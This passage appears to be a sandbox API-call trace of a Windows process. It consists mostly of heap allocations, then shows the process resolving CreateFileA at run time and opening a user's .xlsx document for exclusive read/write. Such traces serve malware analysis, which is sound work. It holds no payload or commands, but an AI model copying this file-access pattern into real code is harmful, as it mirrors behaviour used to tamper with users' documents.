(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0180.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0180.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0180.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0180.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0180.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0180.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0180.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0180.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0180.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0180.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0180.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0180.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0180.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0180.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0180.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0180.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0180.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0180.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0180.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.081] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0180.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0180.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0180.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0180.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0180.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0180.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0180.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.084] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd918 [0180.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd918, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0180.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.084] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0180.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0180.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd918, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0180.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.085] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0180.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0180.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0180.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0180.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0180.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0180.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0180.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3b) returned 0x8db0a8 [0180.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx", cchWideChar=59, lpMultiByteStr=0x8db0a8, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx", lpUsedDefaultChar=0x0) returned 59 [0180.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0180.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0180.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.087] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ycwvofdiac7at.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0180.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0180.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0180.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0180.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0180.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0180.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0180.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0180.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0180.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=59, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0180.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x76) returned 0x8afe68 [0180.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=59, lpWideCharStr=0x8afe68, cchWideChar=59 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx") returned 59 [0180.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0180.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0180.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afe68 | out: hHeap=0x8a0000) returned 1 [0180.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0180.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0180.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0180.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0180.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0180.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0180.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0180.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0180.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0180.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0180.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0180.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0180.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0180.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0180.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 